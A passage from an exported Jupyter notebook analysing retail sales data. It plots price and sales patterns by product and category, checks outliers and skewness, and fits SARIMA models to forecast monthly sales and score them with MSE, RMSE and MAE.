selling price\navg_price = category_data.groupby(['year', 'month'])['sell_price'].mean().reset_index()\n\n# Plot the average selling price per month for each year using a line plot\nplt.figure(figsize=(12, 6))\nsns.lineplot(x='month', y='sell_price', hue='year', data=avg_price)\nplt.title('Average Selling Price per Month for ' + category_data['category_of_product'].iloc[0])\nplt.xlabel('Month')\nplt.ylabel('Average Selling Price')\nplt.show()\n\n\n# In[108]:\n\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\ndata5=data.copy()\ndata5=data5.reset_index()\n# Filter the data for the desired category\ncategory_data = data5[data5['category_of_product'] == 'others']\n\n# Extract the year and month from the 'date' column\ncategory_data['year'] = category_data['date'].dt.year\ncategory_data['month'] = category_data['date'].dt.month\n\n# Group the data by year and month, and calculate the average selling price\navg_price = category_data.groupby(['year', 'month'])['sell_price'].mean().reset_index()\n\n# Plot the average selling price per month for each year using a line plot\nplt.figure(figsize=(12, 6))\nsns.lineplot(x='month', y='sell_price', hue='year', data=avg_price)\nplt.title('Average Selling Price per Month for ' + category_data['category_of_product'].iloc[0])\nplt.xlabel('Month')\nplt.ylabel('Average Selling Price')\nplt.show()\n\n\n# In[109]:\n\n\ndata['product_identifier'].unique()\n\n\n# In[110]:\n\n\nprod_id=[74, 337, 423, 432, 581, 611, 631, 659, 743, 797, 868,\n 904, 926, 972, 973, 1054, 1135, 1173, 1190, 1196, 1228, 1240,\n 1242, 1275, 1322, 1328, 1365, 1424, 1472, 1508, 1542, 1548, 1599,\n 1629, 1672, 1694, 1727, 1753, 2294, 2332, 2492, 2768, 2794, 2818,\n 2853, 2932, 2935, 3004, 3008, 3021]\nfor i in prod_id:\n product_data = data5[data5['product_identifier']==i]\n\n# Convert date column to datetime format\n product_data['date'] = pd.to_datetime(product_data['date'])\n\n# Create a column for year and month\n product_data['year_month'] = product_data['date'].dt.strftime('%Y-%m')\n\n# Calculate average selling price per month for each year\n avg_price = product_data.groupby([product_data['date'].dt.year, product_data['date'].dt.month]).mean()['sell_price']\n avg_price = avg_price.unstack(level=0)\n\n# Plot the comparison using line chart\n avg_price.plot(kind='line', figsize=(6,5), marker='o')\n\n# Set title and labels\n plt.title('Comparison of Average Selling Price of Product {} by Month'.format(i))\n plt.xlabel('Month')\n plt.ylabel('Average Selling Price')\n\n# Show plot\n plt.show()\n\n\n# In[111]:\n\n\nproduct_data = data5[data5['product_identifier']==2935] #put 50 products\n\n\n# Convert date column to datetime format\nproduct_data['date'] = pd.to_datetime(product_data['date'])\n\n# Create a column for year and month\nproduct_data['year_month'] = product_data['date'].dt.strftime('%Y-%m')\n\n# Calculate average selling price per month for each year\navg_price = product_data.groupby([product_data['date'].dt.year, product_data['date'].dt.month]).mean()['sell_price']\navg_price = avg_price.unstack(level=0)\n\n# Plot the comparison using line chart\navg_price.plot(kind='line', figsize=(12,6), marker='o')\n\n# Set title and labels\nplt.title('Comparison of Average Selling Price of Product 2935 by Month')\nplt.xlabel('Month')\nplt.ylabel('Average Selling Price')\n\n# Show plot\nplt.show()\n\n\n# In[112]:\n\n\n# Calculate total sales by category\nsales_by_category = data.groupby('category_of_product')['sales'].sum().reset_index()\n\n# Create a pie chart\nfig, ax = plt.subplots(figsize=(8, 8))\nax.pie(sales_by_category['sales'], labels=sales_by_category['category_of_product'], autopct='%1.1f%%', startangle=90)\n\n# Set title\nax.set_title('Sales by Category of Product')\n\nplt.show()\n\n\n# In[113]:\n\n\n# Calculate total sales per department\ntotal_sales = data.groupby('department_identifier')['sales'].sum().reset_index()\n\n# Create a pie chart\nfig, ax = plt.subplots(figsize=(8, 8))\nax.pie(total_sales['sales'], labels=total_sales['department_identifier'], autopct='%1.1f%%', startangle=90)\nplt.setp(ax.texts, rotation=330, va='center', ha='left')\n\n\n# Set title\nax.set_title('Sales per Department')\n\nplt.show()\n\n\n# In[114]:\n\n\nimport seaborn as sns\n\n# Group data by product identifier and calculate mean selling price and total sales\ngrouped_data = data.groupby('product_identifier').agg({'sell_price': 'mean', 'sales': 'sum'}).reset_index()\n\n# Create a regplot\nsns.regplot(x=grouped_data['sales'], y=grouped_data['sell_price'])\n\n# Set labels and title\nplt.xlabel('Total Sales')\nplt.ylabel('Mean Selling Price')\nplt.title('Relationship between Total Sales and Mean Selling Price')\n\nplt.show()#good fit\n\n\n# In[115]:\n\n\n# Calculate mean selling price per product\nmean_sell_price = data.groupby('product_identifier')['sell_price'].mean().reset_index()\n\n# Calculate total sales per product\ntotal_sales = data.groupby('product_identifier')['sales'].sum().reset_index()\n\n# Merge dataframes on product identifier\nmerged_df = pd.merge(mean_sell_price, total_sales, on='product_identifier')\n\n# Create scatterplot\nplt.figure(figsize=(8, 6))\nplt.scatter( merged_df['sales'],merged_df['sell_price'], alpha=0.5)\n\n# Set labels and title\nplt.ylabel('Mean Selling Price')\nplt.xlabel('Total Sales')\nplt.title('Total Sales vs. Mean Selling Price')\n\nplt.show()\n\n\n# In[116]:\n\n\nsns.pairplot(data[['product_identifier', 'department_identifier', 'category_of_product', 'outlet', 'state', 'sales', 'sell_price']])\n\n\n# # -------------------------------------------------------------------------------\n\n# # Correlation\n\n# In[117]:\n\n\ndata10=data.drop(['day','week_id','year','month'],axis=1)\ncorrmatrix = data10.corr()\nplt.subplots(figsize=(20,10))\nsns.heatmap(corrmatrix,annot=True,cmap = 'YlGnBu')\n\n\n# # Outlier Detection\n\n# In[118]:\n\n\nfor feature in continous_features:\n data.boxplot(column= feature )\n plt.xlabel(feature)\n plt.title(feature)\n plt.show()\n\n\n# In[119]:\n\n\nsns.set(style=\"whitegrid\")\nfig, ax = plt.subplots(figsize=(10,8))\n\nsns.boxplot(x=\"category_of_product\", y=\"sales\", data=data, ax=ax)\n\nax.set_title(\"Boxplot of Category of Product vs Sales\")\nax.set_xlabel(\"Category of Product\")\nax.set_ylabel(\"Sales\")\n\nplt.show()\n\n\n# In[120]:\n\n\ndef find_outliers_IQR(data):\n q1=data.quantile(0.25)\n q3=data.quantile(0.75)\n IQR=q3-q1\n outliers = data[((data<(q1-1.5*IQR)) | (data>(q3+1.5*IQR)))]\n \n return outliers\n\nfor feature in continous_features:\n outliers = find_outliers_IQR(data[feature])\n\n print(feature)\n print('number of outliers: '+ str(len(outliers)))\n print('max outlier value: '+ str(outliers.max()))\n print('min outlier value: '+ str(outliers.min()))\n print('% of outliers: '+ str(len(outliers)/(len(data[feature]))*100))\n print('\\n')\n\n\n\n# In[121]:\n\n\ndef find_outliers_IQR(x):\n q1 = x.quantile(0.25)\n q3 = x.quantile(0.75)\n IQR = q3 - q1\n outliers = x[((x< (q1 - 1.5 * IQR)) | (x > (q3 + 1.5 * IQR)))]\n\n return outliers\n\n# Set the product identifier for which you want to find outliers\nproduct_ids = [ 74, 337, 423, 432, 581, 611, 631, 659, 743, 797, 868,904, 926, 972, 973, 1054, 1135, 1173, 1190, 1196, 1228, 1240,1242, 1275, 1322,\n 1328, 1365, 1424, 1472, 1508, 1542, 1548, 1599,1629, 1672, 1694, 1727, 1753, 2294, 2332, 2492, 2768, 2794, 2818,2853, 2932, 2935, 3004, 3008, 3021]\n\nfor product_id in product_ids: \n product_data = data[data['product_identifier'] == product_id]\n\n # Find outliers for the 'sales' column of the filtered data\n outliers = find_outliers_IQR(product_data['sales'])\n\n # Print the results\n print('Product ID:', product_id)\n print('Number of outliers:', len(outliers))\n print('Max outlier value:', outliers.max())\n print('Min outlier value:', outliers.min())\n print('% of outliers:', len(outliers)/len(product_data)*100,'\\n')\n\n\n product_data.boxplot(by ='product_identifier', column =['sales'],figsize=(15,15), grid = False)\n plt.title(f'Boxplot of sale of product {product_id}')\n plt.show()\n\n\n# In[122]:\n\n\ndef find_outliers_IQR(x):\n q1 = x.quantile(0.25)\n q3 = x.quantile(0.75)\n IQR = q3 - q1\n outliers = x[((x< (q1 - 1.5 * IQR)) | (x > (q3 + 1.5 * IQR)))]\n\n return outliers\n\n# Set the product identifier for which you want to find outliers\nproduct_ids = [ 74, 337, 423, 432, 581, 611, 631, 659, 743, 797, 868,904, 926, 972, 973, 1054, 1135, 1173, 1190, 1196, 1228, 1240,1242, 1275, 1322,\n 1328, 1365, 1424, 1472, 1508, 1542, 1548, 1599,1629, 1672, 1694, 1727, 1753, 2294, 2332, 2492, 2768, 2794, 2818,2853, 2932, 2935, 3004, 3008, 3021]\n\nfor product_id in product_ids: \n product_data = data[data['product_identifier'] == product_id]\n\n # Find outliers for the 'sales' column of the filtered data\n outliers = find_outliers_IQR(product_data['sales'])\n\n # Print the results\n print('Product ID:', product_id)\n print('Number of outliers:', len(outliers))\n print('Max outlier value:', outliers.max())\n print('Min outlier value:', outliers.min())\n print('% of outliers:', len(outliers)/len(product_data)*100,'\\n')\n\n\n product_data.boxplot(by ='product_identifier', column =['sell_price'],figsize=(15,15), grid = False)\n plt.title(f'Boxplot of sell price of product {product_id}')\n plt.show()\n\n\n# # Skewness Detection\n\n# In[123]:\n\n\ndata[continous_features].agg(['skew', 'kurtosis']).transpose()\n\n\n# In[124]:\n\n\ny_drinks_and_food.skew()\n\n\n# In[125]:\n\n\ny_fast_moving_consumer_goods.skew()\n\n\n# In[126]:\n\n\ny_others.skew()\n\n\n# In[127]:\n\n\nfor i in sales_monthly:\n print(f'skewness of {i} product ( {sales_monthly[i].skew()} )')\n \n if sales_monthly[i].skew() > 1.5 or sales_monthly[i].skew() < -1.5 :\n print( f'product {i} is highly skewed \\n ')\n\n\n# # Box-Cox Transformation\n\n# In[128]:\n\n\ncols = [1542]\n#sales_monthly1=sales_monthly.copy()\nfor i in cols:\n sales_monthly[i] = sales_monthly[i].apply(lambda x: np.power(x, (1/1.5)))\n print(sales_monthly[i].skew())\n\n\n# In[129]:\n\n\ncols = [ 2294]\nfor i in cols:\n sales_monthly[i] = sales_monthly[i].apply(lambda x: np.power(x, (1/5)))\n print(sales_monthly[i].skew())\n\n\n# In[130]:\n\n\ncols = [ 926]\nfor i in cols:\n sales_monthly[i] = sales_monthly[i].apply(lambda x: np.power(x, (1/0.6)))\n print(sales_monthly[i].skew())\n\n\n# In[131]:\n\n\ncols = [1240,1672]\nfor i in cols:\n sales_monthly[i] = sales_monthly[i].apply(lambda x: np.power(x, (1/0.8)))\n print(sales_monthly[i].skew())\n\n\n# In[132]:\n\n\nfor i in sales_monthly:\n print(f'skewness of {i} product ( {sales_monthly[i].skew()} )')\n \n if sales_monthly[i].skew() > 1.5 or sales_monthly[i].skew() < -1.5 :\n print( f'product {i} is highly skewed \\n ')\n\n\n# In[133]:\n\n\nsales_monthly.describe().transpose()\n\n\n# # Distribution of numerical data\n\n# In[134]:\n\n\nfor i in continous_features:\n sns.distplot(data[i])\n plt.xlabel(i)\n plt.title(i)\n plt.show()\n\n\n# In[135]:\n\n\nfor i in sales_monthly.columns:\n plt.figure(figsize=(8, 6))\n sns.histplot(data=sales_monthly, x=i)\n plt.xlabel(i)\n plt.title(\"Distribution of \" +str(i))\n plt.show()\n\n\n# # Encoding category wise data\n\n# In[136]:\n\n\ndrinks_and_food_en = pd.get_dummies(drinks_and_food, columns=['category_of_product', 'state'])\n\n\n# In[137]:\n\n\nfast_moving_consumer_goods_en = pd.get_dummies(fast_moving_consumer_goods, columns=['category_of_product', 'state'])\n\n\n# In[138]:\n\n\nothers_en = pd.get_dummies(others, columns=['category_of_product', 'state'])\n\n\n# # -----------------------------------------------------------------------------------------\n\n# # Comparing Other Categories\n\n# In[139]:\n\n\ndfood1 = pd.DataFrame({'Order Date': y_drinks_and_food.index , 'Sales':y_drinks_and_food.values})\n\n\n# In[140]:\n\n\nfmcg1 = pd.DataFrame({'Order Date': y_fast_moving_consumer_goods.index , 'Sales':y_fast_moving_consumer_goods.values})\n\n\n# In[141]:\n\n\nothers1 = pd.DataFrame({'Order Date': y_others.index , 'Sales':y_others.values})\n\n\n# # Data Exploration\n\n# In[142]:\n\n\nstore_drinks_fmcg = dfood1.merge(fmcg1, how='inner', on='Order Date')\nstore_drinks_fmcg.rename(columns={'Sales_x':'drinks_&_food_sales','Sales_y':'fmcg_sales'},inplace=True)\n\n\n# In[143]:\n\n\nstore_drinks_others = dfood1.merge(others1, how='inner', on='Order Date')\nstore_drinks_others.rename(columns={'Sales_x':'drinks_&_food_sales','Sales_y':'others_sales'},inplace=True)\n\n\n# In[144]:\n\n\nstore_others_fmcg = others1.merge(fmcg1, how='inner', on='Order Date')\nstore_others_fmcg.rename(columns={'Sales_x':'others','Sales_y':'fmcg_sales'},inplace=True)\n\n\n# In[145]:\n\n\nstore_drinks_fmcg_others = others1.merge(store_drinks_fmcg, how='inner', on='Order Date')\nstore_drinks_fmcg_others.rename(columns={'Sales':'others_sales','Sales_x':'Drinks_&_food_sales','Sales_y':'FMCG sales'},inplace=True)\n\n\n# ## Plotting\n\n# In[146]:\n\n\nplt.figure(figsize=(20,8))\nplt.plot(store_drinks_fmcg['Order Date'],store_drinks_fmcg['drinks_&_food_sales'],'b-',label='drinks_&_food_sales',linewidth=5)\nplt.plot(store_drinks_fmcg['Order Date'],store_drinks_fmcg['fmcg_sales'],'r-',label='fmcg_sales',linewidth=5)\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Sales of drinks and FMCG')\nplt.legend()\n\n\n# In[147]:\n\n\nplt.figure(figsize=(20,8))\nplt.plot(store_drinks_others['Order Date'],store_drinks_others['drinks_&_food_sales'],'b-',label='drinks_&_food_sales',linewidth=5)\nplt.plot(store_drinks_others['Order Date'],store_drinks_others['others_sales'],'r-',label='others sales',linewidth=5)\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Sales of drinks and other supplies')\nplt.legend()\n\n\n# In[148]:\n\n\nplt.figure(figsize=(20,8))\nplt.plot(store_others_fmcg['Order Date'],store_others_fmcg['fmcg_sales'],'b-',label='fmcg_sales',linewidth=5)\nplt.plot(store_others_fmcg['Order Date'],store_others_fmcg['others'],'r-',label='others',linewidth=5)\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Sales of FMCG and Other supplies')\nplt.legend()\n\n\n# In[149]:\n\n\nplt.figure(figsize=(20,8))\nplt.plot(store_drinks_fmcg_others['Order Date'],store_drinks_fmcg_others['fmcg_sales'],'b-',label='furniture',linewidth=5)\nplt.plot(store_drinks_fmcg_others['Order Date'],store_drinks_fmcg_others['drinks_&_food_sales'],'r-',label='drinks_&_food_sales',linewidth=5)\nplt.plot(store_drinks_fmcg_others['Order Date'],store_drinks_fmcg_others['others_sales'],'g-',label='others_sales',linewidth=5)\nplt.xlabel('Date')\nplt.ylabel('Sales')\nplt.title('Sales of Drinks & Food ,FMCG and Other supllies')\nplt.legend()\n\n\n# # -----------------------------------------------------------------------------\n\n# # -----------------------------------------------------------------------------\n\n# # MODEL CREATION\n\n# # SARIMA Model\n\n# NOTE: During earlier ETS decomposition, it was observed that both category-wise and product-wise data exhibit seasonality. Therefore, SARIMA was chosen over ARIMA to account for the seasonal component in the data.\n\n# ## Product Wise Modelling\n\n# ### Choosing Best Model\n\n# In[150]:\n\n\nfrom statsmodels.tsa.stattools import adfuller\nimport itertools\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndef adf_test(series, title=''):\n \"\"\"\n Pass in a time series and an optional title, returns an ADF report\n \"\"\"\n result = adfuller (series.dropna(), autolag='AIC') # .dropna() handles differenced data\n\n labels = ['ADF test statistic', 'p-value', '# lags used', '# observations']\n out = pd.Series(result[0:4], index=labels)\n\n for key, val in result[4].items():\n out[f'critical value ({key})'] = val\n\n print(out.to_string()) # .to_string() removes the line \"dtype: float64\"\n\n if result[1] <= 0.05:\n d = 0\n print('Data is stationary')\n else:\n d = 1\n print('Data is not stationary')\n\n return d\n\n\n# Assuming sales_monthly is a DataFrame with columns representing time series data\n\nfor col in sales_monthly.columns:\n d = adf_test(sales_monthly[col])\n \n exog_var = price_monthly[col]\n\n p = q = range(0, 2)\n pdq = list(itertools.product(p, [d], q))\n seasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, [d], q))]\n\n lowest_aic = float('inf')\n best_pdq = None\n best_seasonal_pdq = None\n\n print(f'\\nARIMA for: {col}\\n')\n y = sales_monthly.loc[:, [col]]\n\n for param in pdq:\n for param_seasonal in seasonal_pdq:\n try:\n mod = sm.tsa.statespace.SARIMAX(y.values.flatten(), order=param, seasonal_order=param_seasonal, enforce_invertibility=False)\n results = mod.fit()\n\n if results.aic < lowest_aic:\n lowest_aic = results.aic\n best_pdq = param\n best_seasonal_pdq = param_seasonal\n\n print(f'ARIMA{param}x{param_seasonal} - AIC: {results.aic:.2f}')\n\n except:\n continue\n\n print(f'Best ARIMA{best_pdq}x{best_seasonal_pdq} - AIC: {lowest_aic:.2f}')\n\n mod = sm.tsa.statespace.SARIMAX(y.values.flatten(), order=best_pdq, seasonal_order=best_seasonal_pdq, enforce_invertibility=False)\n results = mod.fit()\n print(results.summary().tables[1])\n\n results.plot_diagnostics(figsize=(15, 8))\n plt.show()\n\n\n# ### Prediction using selected model\n\n# In[151]:\n\n\nfrom statsmodels.tsa.stattools import adfuller\nimport itertools\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndef adf_test(series, title=''):\n \"\"\"\n Pass in a time series and an optional title, returns an ADF report\n \"\"\"\n result = adfuller (series.dropna(), autolag='AIC') # .dropna() handles differenced data\n\n #labels = ['ADF test statistic', 'p-value', '# lags used', '# observations']\n #out = pd.Series(result[0:4], index=labels)\n\n #for key, val in result[4].items():\n #out[f'critical value ({key})'] = val\n\n #print(out.to_string()) # .to_string() removes the line \"dtype: float64\"\n\n if result[1] <= 0.05:\n d = 0\n print('Data is stationary')\n else:\n d = 1\n print('Data is not stationary')\n\n return d\n\n\n# Assuming sales_monthly is a DataFrame with columns representing time series data\n\nfor col in sales_monthly.columns:\n print(f'\\nARIMA for: {col}\\n')\n d = adf_test(sales_monthly[col])\n exog_var = price_monthly[col]\n\n p = q = range(0, 2)\n pdq = list(itertools.product(p, [d], q))\n seasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, [d], q))]\n\n lowest_aic = float('inf')\n best_pdq = None\n best_seasonal_pdq = None\n\n y = sales_monthly.loc[:, [col]]\n\n for param in pdq:\n for param_seasonal in seasonal_pdq:\n try:\n mod = sm.tsa.statespace.SARIMAX(y.values.flatten(), order=param, seasonal_order=param_seasonal, enforce_invertibility=False)\n results = mod.fit()\n\n if results.aic < lowest_aic:\n lowest_aic = results.aic\n best_pdq = param\n best_seasonal_pdq = param_seasonal\n\n #print(f'ARIMA{param}x{param_seasonal} - AIC: {results.aic:.2f}')\n\n except:\n continue\n\n print(f'Best ARIMA{best_pdq}x{best_seasonal_pdq} - AIC: {lowest_aic:.2f}\\n')\n\n mod = sm.tsa.statespace.SARIMAX(y, order=best_pdq, seasonal_order=best_seasonal_pdq, enforce_invertibility=False)\n results = mod.fit()\n #print(results.summary().tables[1])\n\n #results.plot_diagnostics(figsize=(15, 8))\n #plt.show()\n # Generate prediction plot\n pred = results.get_prediction(start='2013-07-01', dynamic=False)\n pred_ci = pred.conf_int()\n\n ax = y['2012':].plot(label='Observed')\n pred.predicted_mean.plot(ax=ax, label='One-step ahead Forecast', alpha=.7, figsize=(14, 7))\n ax.fill_between(pred_ci.index, pred_ci.iloc[:, 0], pred_ci.iloc[:, 1], color='k', alpha=.2)\n\n ax.set_xlabel('Date')\n ax.set_ylabel(col)\n\n plt.legend()\n plt.show()\n\n\n# ### Evaluation of Model Created\n\n# In[152]:\n\n\nfrom statsmodels.tsa.stattools import adfuller\nimport itertools\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndef adf_test(series, title=''):\n \"\"\"\n Pass in a time series and an optional title, returns an ADF report\n \"\"\"\n result = adfuller (series.dropna(), autolag='AIC') # .dropna() handles differenced data\n\n #labels = ['ADF test statistic', 'p-value', '# lags used', '# observations']\n #out = pd.Series(result[0:4], index=labels)\n\n #for key, val in result[4].items():\n #out[f'critical value ({key})'] = val\n\n #print(out.to_string()) # .to_string() removes the line \"dtype: float64\"\n\n if result[1] <= 0.05:\n d = 0\n #print('Data is stationary')\n else:\n d = 1\n #print('Data is not stationary')\n\n return d\n\n\n# Assuming sales_monthly is a DataFrame with columns representing time series data\nSA_data = pd.DataFrame(columns=['Product Identifier','MSE_sarima', 'RMSE_sarima','MAE_sarima'])\n\nfor col in sales_monthly.columns:\n #print(f'\\nARIMA for: {col}\\n')\n d = adf_test(sales_monthly[col])\n exog_var = price_monthly[col]\n\n p = q = range(0, 2)\n pdq = list(itertools.product(p, [d], q))\n seasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, [d], q))]\n\n lowest_aic = float('inf')\n best_pdq = None\n best_seasonal_pdq = None\n\n y = sales_monthly.loc[:, [col]]\n\n for param in pdq:\n for param_seasonal in seasonal_pdq:\n try:\n mod = sm.tsa.statespace.SARIMAX(y.values.flatten(), order=param, seasonal_order=param_seasonal, enforce_invertibility=False)\n results = mod.fit()\n\n if results.aic < lowest_aic:\n lowest_aic = results.aic\n best_pdq = param\n best_seasonal_pdq = param_seasonal\n\n #print(f'ARIMA{param}x{param_seasonal} - AIC: {results.aic:.2f}')\n\n except:\n continue\n\n #print(f'Best ARIMA{best_pdq}x{best_seasonal_pdq} - AIC: {lowest_aic:.2f}\\n')\n\n mod = sm.tsa.statespace.SARIMAX(y, order=best_pdq, seasonal_order=best_seasonal_pdq, enforce_invertibility=False)\n results = mod.fit()\n #print(results.summary().tables[1])\n\n #results.plot_diagnostics(figsize=(15, 8))\n #plt.show()\n # Generate prediction plot\n pred = results.get_prediction(start='2013-07-01', dynamic=False)\n pred_ci = pred.conf_int()\n\n # ax = y['2012':].plot(label='Observed')\n # pred.predicted_mean.plot(ax=ax, label='One-step ahead Forecast', alpha=.7, figsize=(14, 7))\n # ax.fill_between(pred_ci.index, pred_ci.iloc[:, 0], pred_ci.iloc[:, 1], color='k', alpha=.2)\n\n #ax.set_xlabel('Date')\n #ax.set_ylabel(col)\n\n #plt.legend()\n #plt.show()\n \n #y_forecasted = pred.predicted_mean\n #y_truth = y['2013-07-01':]\n #y_truth= y_truth.stack()\n #mse = ((y_forecasted - y_truth) ** 2).mean()\n #print(\"The Mean Squared Error of our forecasts is {}\".format(round(mse, 2)))\n #print(\"The Root Mean Squared Error of our forecasts is {}\".format(round(np.sqrt(mse))))\n # Calculate MSE and RMSE\n y_forecasted = pred.predicted_mean\n y_truth = y['2013-07-01':]\n y_pred = y_truth.stack()\n mse = ((y_forecasted - y_pred) ** 2).mean()\n rmse = np.sqrt(mse)\n mae=mean_absolute_error(y_forecasted,y_pred)\n\n # Store MSE and RMSE values in the dataset\n SA_data = SA_data.append({'Product Identifier': col, 'MSE_sarima': mse, 'RMSE_sarima': rmse, 'MAE_sarima': mae}, ignore_index=True)\n\n\n# In[153]:\n\n\nSA_data\n\n\n# ### Forecasting \n\n# In[154]:\n\n\nfrom statsmodels.tsa.stattools import adfuller\nimport itertools\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndef adf_test(series, title=''):\n \"\"\"\n Pass in a time series and an optional title, returns an ADF report\n \"\"\"\n result = adfuller (series.dropna(), autolag='AIC') # .dropna() handles differenced data\n\n #labels = ['ADF test statistic', 'p-value', '# lags used', '# observations']\n #out = pd.Series(result[0:4], index=labels)\n\n #for key, val in result[4].items():\n #out[f'critical value ({key})'] = val\n\n #print(out.to_string()) # .to_string() removes the line \"dtype: float64\"\n\n if result[1] <= 0.05:\n d = 0\n print('Data is stationary')\n else:\n d = 1\n print('Data is not stationary')\n\n return d\n\n\n# Assuming sales_monthly is a DataFrame with columns representing time series data\n\nfor col in sales_monthly.columns:\n print(f'\\nARIMA for: {col}\\n')\n d = adf_test(sales_monthly[col])\n exog_var = price_monthly[col]\n\n p = q = range(0, 2)\n pdq = list(itertools.product(p, [d], q))\n seasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, [d], q))]\n\n lowest_aic = float('inf')\n best_pdq = None\n best_seasonal_pdq = None\n\n y = sales_monthly.loc[:, [col]]\n\n for param in pdq:\n for param_seasonal in seasonal_pdq:\n try:\n mod = sm.tsa.statespace.SARIMAX(y.values.flatten(), order=param, seasonal_order=param_seasonal, enforce_invertibility=False)\n results = mod.fit()\n\n if results.aic < lowest_aic:\n lowest_aic = results.aic\n best_pdq = param\n best_seasonal_pdq = param_seasonal\n\n #print(f'ARIMA{param}x{param_seasonal} - AIC: {results.aic:.2f}')\n\n except:\n continue\n\n print(f'Best ARIMA{best_pdq}x{best_seasonal_pdq} - AIC: {lowest_aic:.2f}\\n')\n\n mod = sm.tsa.statespace.SARIMAX(y, order=best_pdq, seasonal_order=best_seasonal_pdq, enforce_invertibility=False)\n results = mod.fit()\n #print(results.summary().tables[1])\n\n #results.plot_diagnostics(figsize=(15, 8))\n #plt.show()\n # Generate prediction plot\n pred = results.get_prediction(start='2013-07-01', dynamic=False)\n pred_ci = pred.conf_int()\n\n ax = y['2012':].plot(label='Observed')\n pred.predicted_mean.plot(ax=ax, label='One-step ahead Forecast', alpha=.7, figsize=(14, 7))\n ax.fill_between(pred_ci.index, pred_ci.iloc[:, 0], pred_ci.iloc[:, 1], color='k', alpha=.2)\n\n ax.set_xlabel('Date')\n ax.set_ylabel(col)\n\n plt.legend()\n plt.show()\n \n #y_forecasted = pred.predicted_mean\n #y_truth = y['2013-07-01':]\n #y_truth= y_truth.stack()\n #mse = ((y_forecasted - y_truth) ** 2).mean()\n #print(\"The Mean Squared Error of our forecasts is {}\".format(round(mse, 2)))\n #print(\"The Root Mean Squared Error of our forecasts is {}\".format(round(np.sqrt(mse))))\n \n \n pred_uc = results.get_forecast(steps=100)\n pred_cl = pred_uc.conf_int()\n ax = y.plot(label='observed', figsize=(14, 7))\n pred_uc.predicted_mean.plot(ax=ax, label='Forecast')\n ax.fill_between(pred_cl.index, pred_cl.iloc[:, 0], pred_cl.iloc[:, 1], color='k', alpha=.2)\n ax.set_ylim([-100, 100])\n ax.set_xlabel('Date')\n ax.set_ylabel(col)\n plt.legend()\n plt.show()\n\n\n# ## Category wise Modelling\n\n# ### Drinks and Food\n\n# In[155]:\n\n\ny_drinks_and_food.skew()\n\n\n# In[156]:\n\n\n#checking stationarity\n\n\n# In[157]:\n\n\nfrom statsmodels.tsa.stattools import adfuller\n\ndef adf_test1(series,title=''):\n \"\"\"\n Pass in a time series and an optional title, returns an ADF report\n \"\"\"\n print(f'Augmented Dickey-Fuller Test: {title}')\n result = adfuller(series.dropna(),autolag='AIC') # .dropna() handles differenced data\n \n labels = ['ADF test statistic','p-value','# lags used','# observations']\n out = pd.Series(result[0:4],index=labels)\n\n for key,val in result[4].items():\n out[f'critical value ({key})']=val\n \n print(out.to_string()) # .to_string() removes the line \"dtype: float64\"\n \n if result[1] <= 0.05:\n print(\"Strong evidence against the null hypothesis\")\n print(\"Reject the null hypothesis\")\n print(\"Data has no unit root and is stationary\")\n else:\n print(\"Weak evidence against the null hypothesis\")\n print(\"Fail to reject the null hypothesis\")\n print(\"Data has a unit root and is non-stationary\")\n\n\n# In[158]:\n\n\nadf_test1(y_drinks_and_food)\n\n\n# In[159]:\n\n\nimport itertools\nimport statsmodels.api as sm\n\np = q = range(0, 2)\nd = [0] # Fixing d to zero\npdq = list(itertools.product(p, d, q))\nseasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, d, q))]\n\nlowest_aic = float('inf')\nbest_pdq = None\nbest_seasonal_pdq = None\n\nfor param in pdq:\n for param_seasonal in seasonal_pdq:\n try:\n mod = sm.tsa.statespace.SARIMAX(y_drinks_and_food,\n order=param,\n seasonal_order=param_seasonal,\n #enforce_stationarity=False,\n enforce_invertibility=False)\n\n results = mod.fit()\n \n if results.aic < lowest_aic:\n lowest_aic = results.aic\n best_pdq = param\n best_seasonal_pdq = param_seasonal\n\n print('ARIMA{}x{}12 - AIC: {}'.format(param, param_seasonal, results.aic))\n\n except:\n continue\n\nprint(f'Best ARIMA{best_pdq}x{best_seasonal_pdq} - AIC: {lowest_aic:.2f}')\n\n\n# In[160]:\n\n\nmod = sm.tsa.statespace.SARIMAX(y_drinks_and_food,\n order=best_pdq,\n seasonal_order=best_seasonal_pdq,\n #enforce_stationarity=False,\n enforce_invertibility=False)\nresults = mod.fit()\n\n\nresults = mod.fit()\nprint (results.summary().tables[1]) \nresults.plot_diagnostics (figsize=(16, 8)) \nplt.show()\n\n\n# In[161]:\n\n\npred=results.get_prediction (start='2013-07-01', dynamic=False)\n\npred_ci = pred.conf_int()\n\nax=y_drinks_and_food[ '2012':].plot(label='observed')\n\npred.predicted_mean.plot(ax=ax, label='One-step ahead Forecast', alpha=.7, figsize=(14, 7))\nax.fill_between(pred_ci.index,\n pred_ci.iloc[:, 0],\n pred_ci.iloc[:, 1], color='k', alpha=.2)\n\n\nax.set_xlabel('Date')\n\nax.set_ylabel('drinks and food Sales')\n\nplt.legend()\n\nplt.show()\n\n\n# In[162]:\n\n\ny_forecasted_df=pred.predicted_mean\n\ny_truth_df = y_drinks_and_food[ '2013-07-01':]\n\nSA_errors_df = pd.DataFrame(index=y_truth_df.index)\nSA_errors_df['Modelname'] = 'SARIMA'\nSA_errors_df['Actual'] = y_truth_df\nSA_errors_df['Predicted'] = y_forecasted_df\nSA_errors_df['Error'] = y_forecasted_df - y_truth_df\nSA_errors_df.head()\n\nmse_sa_df = ((y_forecasted_df - y_truth_df) ** 2).mean()\n\n# Calculate the mean absolute error (MAE)\nmae_sa_df = mean_absolute_error(y_truth_df, y_forecasted_df)\n\n# Calculate the mean squared error (MSE)\nmse_sa_df = mean_squared_error(y_truth_df, y_forecasted_df)\n# Calculate the root mean 